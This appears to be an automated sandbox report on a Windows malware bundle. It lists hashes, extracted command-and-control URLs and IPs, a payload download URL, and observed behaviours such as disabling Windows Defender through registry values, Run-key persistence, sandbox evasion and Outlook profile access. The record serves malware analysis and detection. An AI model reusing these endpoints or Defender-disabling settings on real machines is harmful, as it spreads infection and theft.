Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 09:33
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
13cefe1fe0ec8a50500e8077af765a55
-
SHA1
9fc255b158387a4b0a68c55d302c72a650d25c92
-
SHA256
f7ff070fae36f647e1f1e3f38c05af36c1d63bb77dcce832081667043eded7ed
-
SHA512
532c43531f3d4b68a1c678e8e9dbf6571b38ce70fa3c28a614c68e26877d0f5b37c4743983454b25c8cda75e7ef9355ed73d70c86291281a938d7c406348c2a9
-
SSDEEP
24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8a08u:XTvC/MTQYxsWR7a08
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rlxspoty.run/nogoaz
https://jrxsafer.top/shpaoz
https://zkrxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://targett.top/dsANGt
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://gkrxspint.digital/kendwz
https://erhxhube.run/pogrs
https://0scenarisacri.top/gHSAYuqo
https://njrxsafer.top/shpaoz
https://mywmedici.top/noagis
https://tacticaltalks.live/glKShay
https://iironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://krxspint.digital/kendwz
https://6grxeasyw.digital/xxepw
Extracted
gcleaner
185.156.73.98
45.91.200.135
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/404-673-0x0000000000920000-0x0000000000D7C000-memory.dmp healer behavioral1/memory/404-674-0x0000000000920000-0x0000000000D7C000-memory.dmp healer behavioral1/memory/404-721-0x0000000000920000-0x0000000000D7C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" c390a85ab1.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c390a85ab1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" c390a85ab1.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c390a85ab1.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" c390a85ab1.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000024387-1035.dat family_stormkitty behavioral1/memory/5748-1064-0x0000000000EA0000-0x0000000000EDC000-memory.dmp family_stormkitty -
Stormkitty family
-
Contacts a large (2590) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ddff17fe91.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ca1bffd716.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ee9ac1adbe.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 72551f9bea.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c390a85ab1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e9b491d42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ but2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 16 232 powershell.exe 37 6104 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 232 powershell.exe 6104 powershell.exe 3768 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 25 IoCs
flow pid Process 164 2572 svchost015.exe 246 4604 rapes.exe 246 4604 rapes.exe 16 232 powershell.exe 37 6104 powershell.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 32 4604 rapes.exe 180 2384 svchost015.exe 230 4900 svchost.exe 272 4604 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 112 takeown.exe 5060 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a594ddf458.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 72551f9bea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c390a85ab1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c390a85ab1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ee9ac1adbe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 72551f9bea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ee9ac1adbe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e9b491d42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e9b491d42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ddff17fe91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ca1bffd716.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a594ddf458.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ca1bffd716.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ddff17fe91.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation larBxd7.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 262.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 262.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 3256 w32tm.exe -
Executes dropped EXE 37 IoCs
pid Process 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 4604 rapes.exe 1032 36c97fadf5.exe 2956 TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE 4704 rapes.exe 5588 ddff17fe91.exe 5640 apple.exe 1504 262.exe 5332 262.exe 948 bf6856f4dd.exe 2572 svchost015.exe 4760 ca1bffd716.exe 2384 svchost015.exe 1896 72551f9bea.exe 4328 a594ddf458.exe 5340 43f9a4e9b0.exe 404 c390a85ab1.exe 2800 qhjMWht.exe 3216 ICQ0sog.exe 2352 rapes.exe 3252 larBxd7.exe 5748 Yhihb8G.exe 5456 Jordan.com 2492 9sWdA2p.exe 4784 TbV75ZR.exe 5836 7IIl2eE.exe 4624 UZPt0hR.exe 4788 Passwords.com 5744 ee9ac1adbe.exe 5768 tzutil.exe 3256 w32tm.exe 13216 1e9b491d42.exe 4180 Rm3cVPI.exe 1720 rapes.exe 740 i4cwegu.exe 5648 but2.exe 3736 pcidrv.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine but2.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine ddff17fe91.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 72551f9bea.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine c390a85ab1.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine ee9ac1adbe.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 1e9b491d42.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine ca1bffd716.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 112 takeown.exe 5060 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features c390a85ab1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c390a85ab1.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Yhihb8G.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Yhihb8G.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Yhihb8G.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\72551f9bea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10444980101\\72551f9bea.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a594ddf458.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10444990101\\a594ddf458.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\43f9a4e9b0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10445000101\\43f9a4e9b0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c390a85ab1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10445010101\\c390a85ab1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 176 ipinfo.io 177 ipinfo.io 276 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ee9ac1adbe.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000242f3-53.dat autoit_exe behavioral1/files/0x000d00000002415e-248.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4536 tasklist.exe 3748 tasklist.exe 5516 tasklist.exe 1012 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 5016 Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE 4604 rapes.exe 2956 TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE 4704 rapes.exe 5588 ddff17fe91.exe 4760 ca1bffd716.exe 1896 72551f9bea.exe 404 c390a85ab1.exe 2352 rapes.exe 5744 ee9ac1adbe.exe 13216 1e9b491d42.exe 1720 rapes.exe 5648 but2.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 948 set thread context of 2572 948 bf6856f4dd.exe 188 PID 4760 set thread context of 2384 4760 ca1bffd716.exe 198 PID 3216 set thread context of 3784 3216 ICQ0sog.exe 227 PID 4784 set thread context of 4448 4784 TbV75ZR.exe 260 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\AmongDouble larBxd7.exe File opened for modification C:\Windows\LowerOrgasm larBxd7.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\GentleOklahoma larBxd7.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\GovernmentalOttawa larBxd7.exe File opened for modification C:\Windows\ModularVol larBxd7.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3568 sc.exe 2536 sc.exe 2140 sc.exe 5008 sc.exe 3292 sc.exe 5984 sc.exe 2704 sc.exe 4328 sc.exe 4992 sc.exe 5540 sc.exe 5368 sc.exe 5748 sc.exe 2000 sc.exe 1516 sc.exe 544 sc.exe 4416 sc.exe 1972 sc.exe 5572 sc.exe 4948 sc.exe 5448 sc.exe 5712 sc.exe 4848 sc.exe 3948 sc.exe 4212 sc.exe 5780 sc.exe 428 sc.exe 2256 sc.exe 1212 sc.exe 412 sc.exe 3592 sc.exe 5904 sc.exe 5788 sc.exe 5580 sc.exe 5252 sc.exe 440 sc.exe 5520 sc.exe 4788 sc.exe 5956 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 4100 5748 WerFault.exe 239 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
